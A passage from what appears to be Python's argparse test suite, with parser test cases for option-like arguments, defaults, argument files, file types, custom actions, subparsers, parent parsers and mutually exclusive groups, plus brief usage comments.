('-z Z X', NS(x='X', y=[], z='Z')),
('X A B -z Z', NS(x='X', y=['A', 'B', '-z', 'Z'], z=None)),
('X Y --foo', NS(x='X', y=['Y', '--foo'], z=None)),
]
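# Illustrative sketch (assumed usage): nargs='...' is argparse.REMAINDER and
# collects every remaining token, even ones that look like options, e.g.
#
#     parser = argparse.ArgumentParser()
#     parser.add_argument('command')
#     parser.add_argument('args', nargs=argparse.REMAINDER)
#     parser.parse_args(['run', '--verbose', 'x'])
#     # -> Namespace(command='run', args=['--verbose', 'x'])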
class TestOptionLike(ParserTestCase):
"""Tests options that may or may not be arguments"""
argument_signatures = [
Sig('-x', type=float),
Sig('-3', type=float, dest='y'),
Sig('z', nargs='*'),
]
failures = ['-x', '-y2.5', '-xa', '-x -a',
'-x -3', '-x -3.5', '-3 -3.5',
'-x -2.5', '-x -2.5 a', '-3 -.5',
'a x -1', '-x -1 a', '-3 -1 a']
successes = [
('', NS(x=None, y=None, z=[])),
('-x 2.5', NS(x=2.5, y=None, z=[])),
('-x 2.5 a', NS(x=2.5, y=None, z=['a'])),
('-3.5', NS(x=None, y=0.5, z=[])),
('-3-.5', NS(x=None, y=-0.5, z=[])),
('-3 .5', NS(x=None, y=0.5, z=[])),
('a -3.5', NS(x=None, y=0.5, z=['a'])),
('a', NS(x=None, y=None, z=['a'])),
('a -x 1', NS(x=1.0, y=None, z=['a'])),
('-x 1 a', NS(x=1.0, y=None, z=['a'])),
('-3 1 a', NS(x=None, y=1.0, z=['a'])),
]
class TestDefaultSuppress(ParserTestCase):
"""Test actions with suppressed defaults"""
argument_signatures = [
Sig('foo', nargs='?', default=argparse.SUPPRESS),
Sig('bar', nargs='*', default=argparse.SUPPRESS),
Sig('--baz', action='store_true', default=argparse.SUPPRESS),
]
failures = ['-x']
successes = [
('', NS()),
('a', NS(foo='a')),
('a b', NS(foo='a', bar=['b'])),
('--baz', NS(baz=True)),
('a --baz', NS(foo='a', baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestParserDefaultSuppress(ParserTestCase):
"""Test actions with a parser-level default of SUPPRESS"""
parser_signature = Sig(argument_default=argparse.SUPPRESS)
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='*'),
Sig('--baz', action='store_true'),
]
failures = ['-x']
successes = [
('', NS()),
('a', NS(foo='a')),
('a b', NS(foo='a', bar=['b'])),
('--baz', NS(baz=True)),
('a --baz', NS(foo='a', baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestParserDefault42(ParserTestCase):
"""Test actions with a parser-level default of 42"""
parser_signature = Sig(argument_default=42, version='1.0')
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='*'),
Sig('--baz', action='store_true'),
]
failures = ['-x']
successes = [
('', NS(foo=42, bar=42, baz=42)),
('a', NS(foo='a', bar=42, baz=42)),
('a b', NS(foo='a', bar=['b'], baz=42)),
('--baz', NS(foo=42, bar=42, baz=True)),
('a --baz', NS(foo='a', bar=42, baz=True)),
('--baz a b', NS(foo='a', bar=['b'], baz=True)),
]
class TestArgumentsFromFile(TempDirMixin, ParserTestCase):
"""Test reading arguments from a file"""
def setUp(self):
super(TestArgumentsFromFile, self).setUp()
file_texts = [
('hello', 'hello world!\n'),
('recursive', '-a\n'
'A\n'
'@hello'),
('invalid', '@no-such-path\n'),
]
for path, text in file_texts:
file = open(path, 'w')
file.write(text)
file.close()
parser_signature = Sig(fromfile_prefix_chars='@')
argument_signatures = [
Sig('-a'),
Sig('x'),
Sig('y', nargs='+'),
]
failures = ['', '-b', 'X', '@invalid', '@missing']
successes = [
('X Y', NS(a=None, x='X', y=['Y'])),
('X -a A Y Z', NS(a='A', x='X', y=['Y', 'Z'])),
('@hello X', NS(a=None, x='hello world!', y=['X'])),
('X @hello', NS(a=None, x='X', y=['hello world!'])),
('-a B @recursive Y Z', NS(a='A', x='hello world!', y=['Y', 'Z'])),
('X @recursive Z -a B', NS(a='B', x='X', y=['hello world!', 'Z'])),
]
class TestArgumentsFromFileConverter(TempDirMixin, ParserTestCase):
"""Test reading arguments from a file"""
def setUp(self):
super(TestArgumentsFromFileConverter, self).setUp()
file_texts = [
('hello', 'hello world!\n'),
]
for path, text in file_texts:
file = open(path, 'w')
file.write(text)
file.close()
class FromFileConverterArgumentParser(ErrorRaisingArgumentParser):
def convert_arg_line_to_args(self, arg_line):
for arg in arg_line.split():
if not arg.strip():
continue
yield arg
parser_class = FromFileConverterArgumentParser
parser_signature = Sig(fromfile_prefix_chars='@')
argument_signatures = [
Sig('y', nargs='+'),
]
failures = []
successes = [
('@hello X', NS(y=['hello', 'world!', 'X'])),
]
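# Illustrative sketch (assumed usage; 'args.txt' is a placeholder name): with
# fromfile_prefix_chars='@', an argument '@args.txt' is replaced by the file's
# contents, one argument per line unless convert_arg_line_to_args (overridden
# above to split on whitespace) says otherwise, e.g.
#
#     parser = argparse.ArgumentParser(fromfile_prefix_chars='@')
#     parser.add_argument('--foo')
#     # with args.txt containing "--foo\nbar\n":
#     parser.parse_args(['@args.txt'])   # -> Namespace(foo='bar')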
# =====================
# Type conversion tests
# =====================
class TestFileTypeRepr(TestCase):
def test_r(self):
type = argparse.FileType('r')
self.assertEqual("FileType('r')", repr(type))
def test_wb_1(self):
type = argparse.FileType('wb', 1)
self.assertEqual("FileType('wb', 1)", repr(type))
class RFile(object):
seen = {}
def __init__(self, name):
self.name = name
__hash__ = None
def __eq__(self, other):
if other in self.seen:
text = self.seen[other]
else:
text = self.seen[other] = other.read()
other.close()
if not isinstance(text, str):
text = text.decode('ascii')
return self.name == other.name == text
class TestFileTypeR(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for reading files"""
def setUp(self):
super(TestFileTypeR, self).setUp()
for file_name in ['foo', 'bar']:
file = open(os.path.join(self.temp_dir, file_name), 'w')
file.write(file_name)
file.close()
self.create_readonly_file('readonly')
argument_signatures = [
Sig('-x', type=argparse.FileType()),
Sig('spam', type=argparse.FileType('r')),
]
failures = ['-x', '-x bar', 'non-existent-file.txt']
successes = [
('foo', NS(x=None, spam=RFile('foo'))),
('-x foo bar', NS(x=RFile('foo'), spam=RFile('bar'))),
('bar -x foo', NS(x=RFile('foo'), spam=RFile('bar'))),
('-x - -', NS(x=sys.stdin, spam=sys.stdin)),
('readonly', NS(x=None, spam=RFile('readonly'))),
]
class TestFileTypeRB(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for reading files"""
def setUp(self):
super(TestFileTypeRB, self).setUp()
for file_name in ['foo', 'bar']:
file = open(os.path.join(self.temp_dir, file_name), 'w')
file.write(file_name)
file.close()
argument_signatures = [
Sig('-x', type=argparse.FileType('rb')),
Sig('spam', type=argparse.FileType('rb')),
]
failures = ['-x', '-x bar']
successes = [
('foo', NS(x=None, spam=RFile('foo'))),
('-x foo bar', NS(x=RFile('foo'), spam=RFile('bar'))),
('bar -x foo', NS(x=RFile('foo'), spam=RFile('bar'))),
('-x - -', NS(x=sys.stdin, spam=sys.stdin)),
]
class WFile(object):
seen = set()
def __init__(self, name):
self.name = name
__hash__ = None
def __eq__(self, other):
if other not in self.seen:
text = 'Check that file is writable.'
if 'b' in other.mode:
text = text.encode('ascii')
other.write(text)
other.close()
self.seen.add(other)
return self.name == other.name
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"non-root user required")
class TestFileTypeW(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for writing files"""
def setUp(self):
super(TestFileTypeW, self).setUp()
self.create_readonly_file('readonly')
argument_signatures = [
Sig('-x', type=argparse.FileType('w')),
Sig('spam', type=argparse.FileType('w')),
]
failures = ['-x', '-x bar', 'readonly']
successes = [
('foo', NS(x=None, spam=WFile('foo'))),
('-x foo bar', NS(x=WFile('foo'), spam=WFile('bar'))),
('bar -x foo', NS(x=WFile('foo'), spam=WFile('bar'))),
('-x - -', NS(x=sys.stdout, spam=sys.stdout)),
]
class TestFileTypeWB(TempDirMixin, ParserTestCase):
"""Test the FileType option/argument type for writing binary files"""
argument_signatures = [
Sig('-x', type=argparse.FileType('wb')),
Sig('spam', type=argparse.FileType('wb')),
]
failures = ['-x', '-x bar']
successes = [
('foo', NS(x=None, spam=WFile('foo'))),
('-x foo bar', NS(x=WFile('foo'), spam=WFile('bar'))),
('bar -x foo', NS(x=WFile('foo'), spam=WFile('bar'))),
('-x - -', NS(x=sys.stdout, spam=sys.stdout)),
]
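# Illustrative sketch (assumed usage; 'data.txt' is a placeholder name):
# argparse.FileType builds a callable that opens the named file in the given
# mode, mapping '-' to sys.stdin or sys.stdout as the tests above expect, e.g.
#
#     parser = argparse.ArgumentParser()
#     parser.add_argument('infile', type=argparse.FileType('r'))
#     parser.parse_args(['data.txt'])   # -> Namespace(infile=<open file>)
#     parser.parse_args(['-'])          # -> Namespace(infile=sys.stdin)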
class TestTypeCallable(ParserTestCase):
"""Test some callables as option/argument types"""
argument_signatures = [
Sig('--eggs', type=complex),
Sig('spam', type=float),
]
failures = ['a', '42j', '--eggs a', '--eggs 2i']
successes = [
('--eggs=42 42', NS(eggs=42, spam=42.0)),
('--eggs 2j -- -1.5', NS(eggs=2j, spam=-1.5)),
('1024.675', NS(eggs=None, spam=1024.675)),
]
class TestTypeUserDefined(ParserTestCase):
"""Test a user-defined option/argument type"""
class MyType(TestCase):
def __init__(self, value):
self.value = value
__hash__ = None
def __eq__(self, other):
return (type(self), self.value) == (type(other), other.value)
argument_signatures = [
Sig('-x', type=MyType),
Sig('spam', type=MyType),
]
failures = []
successes = [
('a -x b', NS(x=MyType('b'), spam=MyType('a'))),
('-xf g', NS(x=MyType('f'), spam=MyType('g'))),
]
class TestTypeClassicClass(ParserTestCase):
"""Test a classic class type"""
class C:
def __init__(self, value):
self.value = value
__hash__ = None
def __eq__(self, other):
return (type(self), self.value) == (type(other), other.value)
argument_signatures = [
Sig('-x', type=C),
Sig('spam', type=C),
]
failures = []
successes = [
('a -x b', NS(x=C('b'), spam=C('a'))),
('-xf g', NS(x=C('f'), spam=C('g'))),
]
class TestTypeRegistration(TestCase):
"""Test a user-defined type by registering it"""
def test(self):
def get_my_type(string):
return 'my_type{%s}' % string
parser = argparse.ArgumentParser()
parser.register('type', 'my_type', get_my_type)
parser.add_argument('-x', type='my_type')
parser.add_argument('y', type='my_type')
self.assertEqual(parser.parse_args('1'.split()),
NS(x=None, y='my_type{1}'))
self.assertEqual(parser.parse_args('-x 1 42'.split()),
NS(x='my_type{1}', y='my_type{42}'))
# ============
# Action tests
# ============
class TestActionUserDefined(ParserTestCase):
"""Test a user-defined option/argument action"""
class OptionalAction(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
try:
# check destination and option string
assert self.dest == 'spam', 'dest: %s' % self.dest
assert option_string == '-s', 'flag: %s' % option_string
# when option is before argument, badger=2, and when
# option is after argument, badger=<whatever was set>
expected_ns = NS(spam=0.25)
if value in [0.125, 0.625]:
expected_ns.badger = 2
elif value in [2.0]:
expected_ns.badger = 84
else:
raise AssertionError('value: %s' % value)
assert expected_ns == namespace, ('expected %s, got %s' %
(expected_ns, namespace))
except AssertionError:
e = sys.exc_info()[1]
raise ArgumentParserError('opt_action failed: %s' % e)
setattr(namespace, 'spam', value)
class PositionalAction(argparse.Action):
def __call__(self, parser, namespace, value, option_string=None):
try:
assert option_string is None, ('option_string: %s' %
option_string)
# check destination
assert self.dest == 'badger', 'dest: %s' % self.dest
# when argument is before option, spam=0.25, and when
# option is after argument, spam=<whatever was set>
expected_ns = NS(badger=2)
if value in [42, 84]:
expected_ns.spam = 0.25
elif value in [1]:
expected_ns.spam = 0.625
elif value in [2]:
expected_ns.spam = 0.125
else:
raise AssertionError('value: %s' % value)
assert expected_ns == namespace, ('expected %s, got %s' %
(expected_ns, namespace))
except AssertionError:
e = sys.exc_info()[1]
raise ArgumentParserError('arg_action failed: %s' % e)
setattr(namespace, 'badger', value)
argument_signatures = [
Sig('-s', dest='spam', action=OptionalAction,
type=float, default=0.25),
Sig('badger', action=PositionalAction,
type=int, nargs='?', default=2),
]
failures = []
successes = [
('-s0.125', NS(spam=0.125, badger=2)),
('42', NS(spam=0.25, badger=42)),
('-s 0.625 1', NS(spam=0.625, badger=1)),
('84 -s2', NS(spam=2.0, badger=84)),
]
class TestActionRegistration(TestCase):
"""Test a user-defined action supplied by registering it"""
class MyAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, 'foo[%s]' % values)
def test(self):
parser = argparse.ArgumentParser()
parser.register('action', 'my_action', self.MyAction)
parser.add_argument('badger', action='my_action')
self.assertEqual(parser.parse_args(['1']), NS(badger='foo[1]'))
self.assertEqual(parser.parse_args(['42']), NS(badger='foo[42]'))
# ================
# Subparsers tests
# ================
class TestAddSubparsers(TestCase):
"""Test the add_subparsers method"""
def assertArgumentParserError(self, *args, **kwargs):
self.assertRaises(ArgumentParserError, *args, **kwargs)
def _get_parser(self, subparser_help=False, prefix_chars=None):
# create a parser with a subparsers argument
if prefix_chars:
parser = ErrorRaisingArgumentParser(
prog='PROG', description='main description', prefix_chars=prefix_chars)
parser.add_argument(
prefix_chars[0] * 2 + 'foo', action='store_true', help='foo help')
else:
parser = ErrorRaisingArgumentParser(
prog='PROG', description='main description')
parser.add_argument(
'--foo', action='store_true', help='foo help')
parser.add_argument(
'bar', type=float, help='bar help')
# check that only one subparsers argument can be added
subparsers = parser.add_subparsers(help='command help')
self.assertArgumentParserError(parser.add_subparsers)
# add first sub-parser
parser1_kwargs = dict(description='1 description')
if subparser_help:
parser1_kwargs['help'] = '1 help'
parser1 = subparsers.add_parser('1', **parser1_kwargs)
parser1.add_argument('-w', type=int, help='w help')
parser1.add_argument('x', choices='abc', help='x help')
# add second sub-parser
parser2_kwargs = dict(description='2 description')
if subparser_help:
parser2_kwargs['help'] = '2 help'
parser2 = subparsers.add_parser('2', **parser2_kwargs)
parser2.add_argument('-y', choices='123', help='y help')
parser2.add_argument('z', type=complex, nargs='*', help='z help')
# return the main parser
return parser
def setUp(self):
super(TestAddSubparsers, self).setUp()
self.parser = self._get_parser()
self.command_help_parser = self._get_parser(subparser_help=True)
def test_parse_args_failures(self):
# check some failure cases:
for args_str in ['', 'a', 'a a', '0.5 a', '0.5 1',
'0.5 1 -y', '0.5 2 -w']:
args = args_str.split()
self.assertArgumentParserError(self.parser.parse_args, args)
def test_parse_args(self):
# check some non-failure cases:
self.assertEqual(
self.parser.parse_args('0.5 1 b -w 7'.split()),
NS(foo=False, bar=0.5, w=7, x='b'),
)
self.assertEqual(
self.parser.parse_args('0.25 --foo 2 -y 2 3j -- -1j'.split()),
NS(foo=True, bar=0.25, y='2', z=[3j, -1j]),
)
self.assertEqual(
self.parser.parse_args('--foo 0.125 1 c'.split()),
NS(foo=True, bar=0.125, w=None, x='c'),
)
def test_parse_known_args(self):
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), []),
)
self.assertEqual(
self.parser.parse_known_args('0.5 -p 1 b -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-p']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -w 7 -p'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-p']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 1 b -q -rs -w 7'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-q', '-rs']),
)
self.assertEqual(
self.parser.parse_known_args('0.5 -W 1 b -X Y -w 7 Z'.split()),
(NS(foo=False, bar=0.5, w=7, x='b'), ['-W', '-X', 'Y', 'Z']),
)
def test_dest(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('--foo', action='store_true')
subparsers = parser.add_subparsers(dest='bar')
parser1 = subparsers.add_parser('1')
parser1.add_argument('baz')
self.assertEqual(NS(foo=False, bar='1', baz='2'),
parser.parse_args('1 2'.split()))
def test_help(self):
self.assertEqual(self.parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(self.parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
-h, --help show this help message and exit
--foo foo help
'''))
def test_help_extra_prefix_chars(self):
# Make sure - is still used for help if it is a non-first prefix char
parser = self._get_parser(prefix_chars='+:-')
self.assertEqual(parser.format_usage(),
'usage: PROG [-h] [++foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [++foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
-h, --help show this help message and exit
++foo foo help
'''))
def test_help_alternate_prefix_chars(self):
parser = self._get_parser(prefix_chars='+:/')
self.assertEqual(parser.format_usage(),
'usage: PROG [+h] [++foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [+h] [++foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
optional arguments:
+h, ++help show this help message and exit
++foo foo help
'''))
def test_parser_command_help(self):
self.assertEqual(self.command_help_parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(self.command_help_parser.format_help(),
textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
{1,2} command help
1 1 help
2 2 help
optional arguments:
-h, --help show this help message and exit
--foo foo help
'''))
def test_subparser_title_help(self):
parser = ErrorRaisingArgumentParser(prog='PROG',
description='main description')
parser.add_argument('--foo', action='store_true', help='foo help')
parser.add_argument('bar', help='bar help')
subparsers = parser.add_subparsers(title='subcommands',
description='command help',
help='additional text')
parser1 = subparsers.add_parser('1')
parser2 = subparsers.add_parser('2')
self.assertEqual(parser.format_usage(),
'usage: PROG [-h] [--foo] bar {1,2} ...\n')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [--foo] bar {1,2} ...
main description
positional arguments:
bar bar help
optional arguments:
-h, --help show this help message and exit
--foo foo help
subcommands:
command help
{1,2} additional text
'''))
def _test_subparser_help(self, args_str, expected_help):
try:
self.parser.parse_args(args_str.split())
except ArgumentParserError:
err = sys.exc_info()[1]
if err.stdout != expected_help:
print(repr(expected_help))
print(repr(err.stdout))
self.assertEqual(err.stdout, expected_help)
def test_subparser1_help(self):
self._test_subparser_help('5.0 1 -h', textwrap.dedent('''\
usage: PROG bar 1 [-h] [-w W] {a,b,c}
1 description
positional arguments:
{a,b,c} x help
optional arguments:
-h, --help show this help message and exit
-w W w help
'''))
def test_subparser2_help(self):
self._test_subparser_help('5.0 2 -h', textwrap.dedent('''\
usage: PROG bar 2 [-h] [-y {1,2,3}] [z [z ...]]
2 description
positional arguments:
z z help
optional arguments:
-h, --help show this help message and exit
-y {1,2,3} y help
'''))
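# Illustrative sketch (assumed usage; 'checkout' and 'branch' are placeholder
# names): each sub-command added via add_subparsers gets its own parser, and
# the chosen sub-parser consumes the remaining arguments, e.g.
#
#     parser = argparse.ArgumentParser()
#     subparsers = parser.add_subparsers(dest='command')
#     checkout = subparsers.add_parser('checkout')
#     checkout.add_argument('branch')
#     parser.parse_args(['checkout', 'main'])
#     # -> Namespace(command='checkout', branch='main')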
# ============
# Groups tests
# ============
class TestPositionalsGroups(TestCase):
"""Tests that order of group positionals matches construction order"""
def test_nongroup_first(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('foo')
group = parser.add_argument_group('g')
group.add_argument('bar')
parser.add_argument('baz')
expected = NS(foo='1', bar='2', baz='3')
result = parser.parse_args('1 2 3'.split())
self.assertEqual(expected, result)
def test_group_first(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_argument_group('xxx')
group.add_argument('foo')
parser.add_argument('bar')
parser.add_argument('baz')
expected = NS(foo='1', bar='2', baz='3')
result = parser.parse_args('1 2 3'.split())
self.assertEqual(expected, result)
def test_interleaved_groups(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_argument_group('xxx')
parser.add_argument('foo')
group.add_argument('bar')
parser.add_argument('baz')
group = parser.add_argument_group('yyy')
group.add_argument('frell')
expected = NS(foo='1', bar='2', baz='3', frell='4')
result = parser.parse_args('1 2 3 4'.split())
self.assertEqual(expected, result)
# ===================
# Parent parser tests
# ===================
class TestParentParsers(TestCase):
"""Tests that parsers can be created with parent parsers"""
def assertArgumentParserError(self, *args, **kwargs):
self.assertRaises(ArgumentParserError, *args, **kwargs)
def setUp(self):
super(TestParentParsers, self).setUp()
self.wxyz_parent = ErrorRaisingArgumentParser(add_help=False)
self.wxyz_parent.add_argument('--w')
x_group = self.wxyz_parent.add_argument_group('x')
x_group.add_argument('-y')
self.wxyz_parent.add_argument('z')
self.abcd_parent = ErrorRaisingArgumentParser(add_help=False)
self.abcd_parent.add_argument('a')
self.abcd_parent.add_argument('-b')
c_group = self.abcd_parent.add_argument_group('c')
c_group.add_argument('--d')
self.w_parent = ErrorRaisingArgumentParser(add_help=False)
self.w_parent.add_argument('--w')
self.z_parent = ErrorRaisingArgumentParser(add_help=False)
self.z_parent.add_argument('z')
# parents with mutually exclusive groups
self.ab_mutex_parent = ErrorRaisingArgumentParser(add_help=False)
group = self.ab_mutex_parent.add_mutually_exclusive_group()
group.add_argument('-a', action='store_true')
group.add_argument('-b', action='store_true')
self.main_program = os.path.basename(sys.argv[0])
def test_single_parent(self):
parser = ErrorRaisingArgumentParser(parents=[self.wxyz_parent])
self.assertEqual(parser.parse_args('-y 1 2 --w 3'.split()),
NS(w='3', y='1', z='2'))
def test_single_parent_mutex(self):
self._test_mutex_ab(self.ab_mutex_parent.parse_args)
parser = ErrorRaisingArgumentParser(parents=[self.ab_mutex_parent])
self._test_mutex_ab(parser.parse_args)
def test_single_grandparent_mutex(self):
parents = [self.ab_mutex_parent]
parser = ErrorRaisingArgumentParser(add_help=False, parents=parents)
parser = ErrorRaisingArgumentParser(parents=[parser])
self._test_mutex_ab(parser.parse_args)
def _test_mutex_ab(self, parse_args):
self.assertEqual(parse_args([]), NS(a=False, b=False))
self.assertEqual(parse_args(['-a']), NS(a=True, b=False))
self.assertEqual(parse_args(['-b']), NS(a=False, b=True))
self.assertArgumentParserError(parse_args, ['-a', '-b'])
self.assertArgumentParserError(parse_args, ['-b', '-a'])
self.assertArgumentParserError(parse_args, ['-c'])
self.assertArgumentParserError(parse_args, ['-a', '-c'])
self.assertArgumentParserError(parse_args, ['-b', '-c'])
def test_multiple_parents(self):
parents = [self.abcd_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('--d 1 --w 2 3 4'.split()),
NS(a='3', b=None, d='1', w='2', y=None, z='4'))
def test_multiple_parents_mutex(self):
parents = [self.ab_mutex_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('-a --w 2 3'.split()),
NS(a=True, b=False, w='2', y=None, z='3'))
self.assertArgumentParserError(
parser.parse_args, '-a --w 2 3 -b'.split())
self.assertArgumentParserError(
parser.parse_args, '-a -b --w 2 3'.split())
def test_conflicting_parents(self):
self.assertRaises(
argparse.ArgumentError,
argparse.ArgumentParser,
parents=[self.w_parent, self.wxyz_parent])
def test_conflicting_parents_mutex(self):
self.assertRaises(
argparse.ArgumentError,
argparse.ArgumentParser,
parents=[self.abcd_parent, self.ab_mutex_parent])
def test_same_argument_name_parents(self):
parents = [self.wxyz_parent, self.z_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
self.assertEqual(parser.parse_args('1 2'.split()),
NS(w=None, y=None, z='2'))
def test_subparser_parents(self):
parser = ErrorRaisingArgumentParser()
subparsers = parser.add_subparsers()
abcde_parser = subparsers.add_parser('bar', parents=[self.abcd_parent])
abcde_parser.add_argument('e')
self.assertEqual(parser.parse_args('bar -b 1 --d 2 3 4'.split()),
NS(a='3', b='1', d='2', e='4'))
def test_subparser_parents_mutex(self):
parser = ErrorRaisingArgumentParser()
subparsers = parser.add_subparsers()
parents = [self.ab_mutex_parent]
abc_parser = subparsers.add_parser('foo', parents=parents)
c_group = abc_parser.add_argument_group('c_group')
c_group.add_argument('c')
parents = [self.wxyz_parent, self.ab_mutex_parent]
wxyzabe_parser = subparsers.add_parser('bar', parents=parents)
wxyzabe_parser.add_argument('e')
self.assertEqual(parser.parse_args('foo -a 4'.split()),
NS(a=True, b=False, c='4'))
self.assertEqual(parser.parse_args('bar -b --w 2 3 4'.split()),
NS(a=False, b=True, w='2', y=None, z='3', e='4'))
self.assertArgumentParserError(
parser.parse_args, 'foo -a -b 4'.split())
self.assertArgumentParserError(
parser.parse_args, 'bar -b -a 4'.split())
def test_parent_help(self):
parents = [self.abcd_parent, self.wxyz_parent]
parser = ErrorRaisingArgumentParser(parents=parents)
parser_help = parser.format_help()
progname = self.main_program
self.assertEqual(parser_help, textwrap.dedent('''\
usage: {}{}[-h] [-b B] [--d D] [--w W] [-y Y] a z
positional arguments:
a
z
optional arguments:
-h, --help show this help message and exit
-b B
--w W
c:
--d D
x:
-y Y
'''.format(progname, ' ' if progname else '' )))
def test_groups_parents(self):
parent = ErrorRaisingArgumentParser(add_help=False)
g = parent.add_argument_group(title='g', description='gd')
g.add_argument('-w')
g.add_argument('-x')
m = parent.add_mutually_exclusive_group()
m.add_argument('-y')
m.add_argument('-z')
parser = ErrorRaisingArgumentParser(parents=[parent])
self.assertRaises(ArgumentParserError, parser.parse_args,
['-y', 'Y', '-z', 'Z'])
parser_help = parser.format_help()
progname = self.main_program
self.assertEqual(parser_help, textwrap.dedent('''\
usage: {}{}[-h] [-w W] [-x X] [-y Y | -z Z]
optional arguments:
-h, --help show this help message and exit
-y Y
-z Z
g:
gd
-w W
-x X
'''.format(progname, ' ' if progname else '' )))
# ==============================
# Mutually exclusive group tests
# ==============================
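# Illustrative sketch (assumed usage; '--json' and '--xml' are placeholder
# names): a mutually exclusive group rejects combinations of its options and,
# when required=True, also rejects an empty command line, e.g.
#
#     parser = argparse.ArgumentParser()
#     group = parser.add_mutually_exclusive_group(required=True)
#     group.add_argument('--json', action='store_true')
#     group.add_argument('--xml', action='store_true')
#     parser.parse_args(['--json'])            # ok
#     parser.parse_args(['--json', '--xml'])   # error: not allowed together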
class TestMutuallyExclusiveGroupErrors(TestCase):
def test_invalid_add_argument_group(self):
parser = ErrorRaisingArgumentParser()
raises = self.assertRaises
raises(TypeError, parser.add_mutually_exclusive_group, title='foo')
def test_invalid_add_argument(self):
parser = ErrorRaisingArgumentParser()
group = parser.add_mutually_exclusive_group()
add_argument = group.add_argument
raises = self.assertRaises
raises(ValueError, add_argument, '--foo', required=True)
raises(ValueError, add_argument, 'bar')
raises(ValueError, add_argument, 'bar', nargs='+')
raises(ValueError, add_argument, 'bar', nargs=1)
raises(ValueError, add_argument, 'bar', nargs=argparse.PARSER)
def test_help(self):
parser = ErrorRaisingArgumentParser(prog='PROG')
group1 = parser.add_mutually_exclusive_group()
group1.add_argument('--foo', action='store_true')
group1.add_argument('--bar', action='store_false')
group2 = parser.add_mutually_exclusive_group()
group2.add_argument('--soup', action='store_true')
group2.add_argument('--nuts', action='store_false')
expected = '''\
usage: PROG [-h] [--foo | --bar] [--soup | --nuts]
optional arguments:
-h, --help show this help message and exit
--foo
--bar
--soup
--nuts
'''
self.assertEqual(parser.format_help(), textwrap.dedent(expected))
class MEMixin(object):
def test_failures_when_not_required(self):
parse_args = self.get_parser(required=False).parse_args
error = ArgumentParserError
for args_string in self.failures:
self.assertRaises(error, parse_args, args_string.split())
def test_failures_when_required(self):
parse_args = self.get_parser(required=True).parse_args
error = ArgumentParserError
for args_string in self.failures + ['']:
self.assertRaises(error, parse_args, args_string.split())
def test_successes_when_not_required(self):
parse_args = self.get_parser(required=False).parse_args
successes = self.successes + self.successes_when_not_required
for args_string, expected_ns in successes:
actual_ns = parse_args(args_string.split())
self.assertEqual(actual_ns, expected_ns)
def test_successes_when_required(self):
parse_args = self.get_parser(required=True).parse_args
for args_string, expected_ns in self.successes:
actual_ns = parse_args(args_string.split())
self.assertEqual(actual_ns, expected_ns)
def test_usage_when_not_required(self):
format_usage = self.get_parser(required=False).format_usage
expected_usage = self.usage_when_not_required
self.assertEqual(format_usage(), textwrap.dedent(expected_usage))
def test_usage_when_required(self):
format_usage = self.get_parser(required=True).format_usage
expected_usage = self.usage_when_required
self.assertEqual(format_usage(), textwrap.dedent(expected_usage))
def test_help_when_not_required(self):
format_help = self.get_parser(required=False).format_help
help = self.usage_when_not_required + self.help
self.assertEqual(format_help(), textwrap.dedent(help))
def test_help_when_required(self):
format_help = self.get_parser(required=True).format_help
help = self.usage_when_required + self.help
self.assertEqual(format_help(), textwrap.dedent(help))
class TestMutuallyExclusiveSimple(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
group = parser.add_mutually_exclusive_group(required=required)
group.add_argument('--bar', help='bar help')
group.add_argument('--baz', nargs='?', const='Z', help='baz help')
return parser
failures = ['--bar X --baz Y', '--bar X --baz']
successes = [
('--bar X', NS(bar='X', baz=None)),
('--bar X --bar Z', NS(bar='Z', baz=None)),
('--baz Y', NS(bar=None, baz='Y')),
('--baz', NS(bar=None, baz='Z')),
]
successes_when_not_required = [
('', NS(bar=None, baz=None)),
]
usage_when_not_required = '''\
usage: PROG [-h] [--bar BAR | --baz [BAZ]]
'''
usage_when_required = '''\
usage: PROG [-h] (--bar BAR | --baz [BAZ])
'''
help = '''\
optional arguments:
-h, --help show this help message and exit
--bar BAR bar help
--baz [BAZ] baz help
'''
class TestMutuallyExclusiveLong(MEMixin, TestCase):
def get_parser(self, required=None):
parser = ErrorRaisingArgumentParser(prog='PROG')
parser.add_argument('--abcde', help='abcde help')
